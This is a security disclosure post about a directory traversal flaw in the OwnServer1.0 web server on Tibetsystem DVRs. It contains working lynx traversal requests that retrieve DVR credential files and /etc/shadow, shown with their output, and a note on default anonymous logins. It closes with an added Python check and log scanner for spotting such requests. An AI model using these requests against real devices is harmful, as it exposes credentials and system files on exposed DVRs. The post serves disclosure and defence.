I tried to report this to the vendor in 2009.

SHODAN "OwnServer1.0": Results 1 - 10 of about 11832 for OwnServer1.0 country:US.

-Jason Ellison

---------- Forwarded message ----------
From: Jason Ellison <infotek@gmail.com>
Date: Fri, Apr 10, 2009 at 5:02 PM
Subject: DVR Security Issue
To: sales@tibetsystem.com

Hello,

I am an I.T. consultant in the U.S. I have discovered a security flaw in your product. Please forward this to the appropriate person in your company (a software engineer, maybe?).

Tibetsystem DVR security issue:

Your Windows- and Linux-based DVRs use the same web server, "OwnServer1.0". This web server has a directory traversal vulnerability that was discovered in 2004. This can be used to get the usernames and passwords of the DVR (or any local file). The usernames and passwords are hex-encoded ASCII. In addition to this, the web app delivers the complete server config, including ALL valid usernames and passwords, if you give proper authentication. So if I log in using the default anonymous:blank, all accounts and passwords are delivered in clear text.

Is there an update for this issue?

$ lynx -source http://a.b.c.d/../../../../../../../home/dvr/sdvr/kdvr/user.ini
[@Sdvr]
validate=1
[user_time]
admin=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
anonymous=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
[users]
admin=61646D696E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FF130000FFFF00000000000000000000000000000000000019
anonymous=616E6F6E796D6F75730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001A0000FFFFFF

$ lynx -source http://a.b.c.d/../../windows/dvr2.ini
[generic]
encoder=0
dual_streaming=1
[dfs3]
current_path=E:\dfs
recycle=1
retain=0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
record_path=F:\dfs;E:\dfs;
[Viewer]
run=C:\dvr\remote.exe,5.5.0.0
setup=C:\dvr\client\clientinstall.exe,5.5.0.0
[user_time]
admin=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
anonymous=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
[user32]
admin=61646D696E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FF930000FFFF00000000000000000000000000000000000099
anonymous=616E6F6E796D6F75730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0000FFFFFFFF130000001300000013000000130000003B

$ lynx -source http://10.10.10.56/../../../../../../../etc/shadow
root:$1$q0HFBbpi$removed:13328:0:99999:7:::
bin:*:13328:0:99999:7:::
daemon:*:13328:0:99999:7:::
adm:*:13328:0:99999:7:::
lp:*:13328:0:99999:7:::
sync:*:13328:0:99999:7:::
shutdown:*:13328:0:99999:7:::
halt:*:13328:0:99999:7:::
mail:*:13328:0:99999:7:::
news:*:13328:0:99999:7:::
uucp:*:13328:0:99999:7:::
operator:*:13328:0:99999:7:::
games:*:13328:0:99999:7:::
nobody:*:13328:0:99999:7:::
rpm:!!:13328::::::
messagebus:!!:13328::::::
haldaemon:!!:13328::::::
vcsa:!!:13328::::::
xfs:!!:13328::::::
rpc:!!:13328::::::
rpcuser:!!:13328::::::
clamav:!!:13328::::::
sshd:!!:13328::::::
quess:$1$tpvrlLSt$removed:13328:0:99999:7:::

$ lynx -source http://a.b.c.d/../../boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home Edition" /noexecute=optin /fastdetect

OwnServer 1.0 Directory Transversal Vulnerability
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2004-01/0184.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
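The flaw the post describes is a static-file handler that joins the request path onto its document root without checking where the result lands. The following is an added example, not code from the post and not Tibetsystem's or OwnServer's own code: a document-root check of the kind such a server needs, plus a small access-log scan that uses the same check to flag the traversal requests shown above. The function names, the document root "/dvr/web" and the log lines are constructed for this example.

```python
"""
Added example (not part of the original Full-Disclosure post and not the
DVR vendor's code): a document-root path check for a static-file handler
and a log scan that flags requests escaping the root. The document root
"/dvr/web", the function names and the log lines are constructed here.
"""
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (Common Log Format) modelled on the requests
# in the post; client addresses and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Apr/2009:17:02:11 -0500] "GET /../../../../../../../home/dvr/sdvr/kdvr/user.ini HTTP/1.0" 200 1532
10.0.0.5 - - [10/Apr/2009:17:02:30 -0500] "GET /../../windows/dvr2.ini HTTP/1.0" 200 2210
10.0.0.7 - - [10/Apr/2009:17:03:02 -0500] "GET /index.html HTTP/1.1" 200 812
10.0.0.9 - - [10/Apr/2009:17:03:40 -0500] "GET /%2e%2e/%2e%2e/boot.ini HTTP/1.1" 200 190
10.0.0.7 - - [10/Apr/2009:17:04:15 -0500] "GET /images/../live.html HTTP/1.1" 200 4410
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|HEAD|POST) (\S+) HTTP/')


def resolve_under_root(doc_root, url_path):
    """Map a request path onto a file under doc_root.

    Returns the resolved absolute path, or None when the request would
    escape the document root. The path is percent-decoded once, and
    backslashes are treated as separators because the vulnerable server
    also ran on Windows, where "..\\" climbs a directory just as "../" does.
    The raw decoded path is joined onto the root first and only then
    normalised: "/../../../etc/shadow" joined onto "/dvr/web" normalises to
    "/etc/shadow", which fails the prefix test. Normalising the request on
    its own first would discard the leading ".." segments and hide the
    escape. A ".." that stays inside the root ("/images/../live.html") is
    accepted, so this is a semantic check rather than a ".." substring ban.
    """
    root = posixpath.normpath(doc_root)
    prefix = root if root.endswith("/") else root + "/"
    decoded = unquote(url_path).replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(prefix):
        return candidate
    return None


def traversal_hits(log_text, doc_root="/dvr/web"):
    """Return (client, request_path) for every logged request that would
    resolve outside doc_root. Query strings are dropped before checking."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        path = urlsplit(target).path
        if resolve_under_root(doc_root, path) is None:
            hits.append((client, path))
    return hits


if __name__ == "__main__":
    for client, path in traversal_hits(SAMPLE_LOG):
        print(f"{client} requested {path!r}, which resolves outside the document root")
```

Run against the constructed log, the scan reports the two "/../../" requests and the percent-encoded "%2e%2e" variant, while "/index.html" and the in-root "/images/../live.html" pass. The same `resolve_under_root` call is the one a file handler should make before opening anything; a server that only strips the literal string "../" misses the encoded and backslash forms.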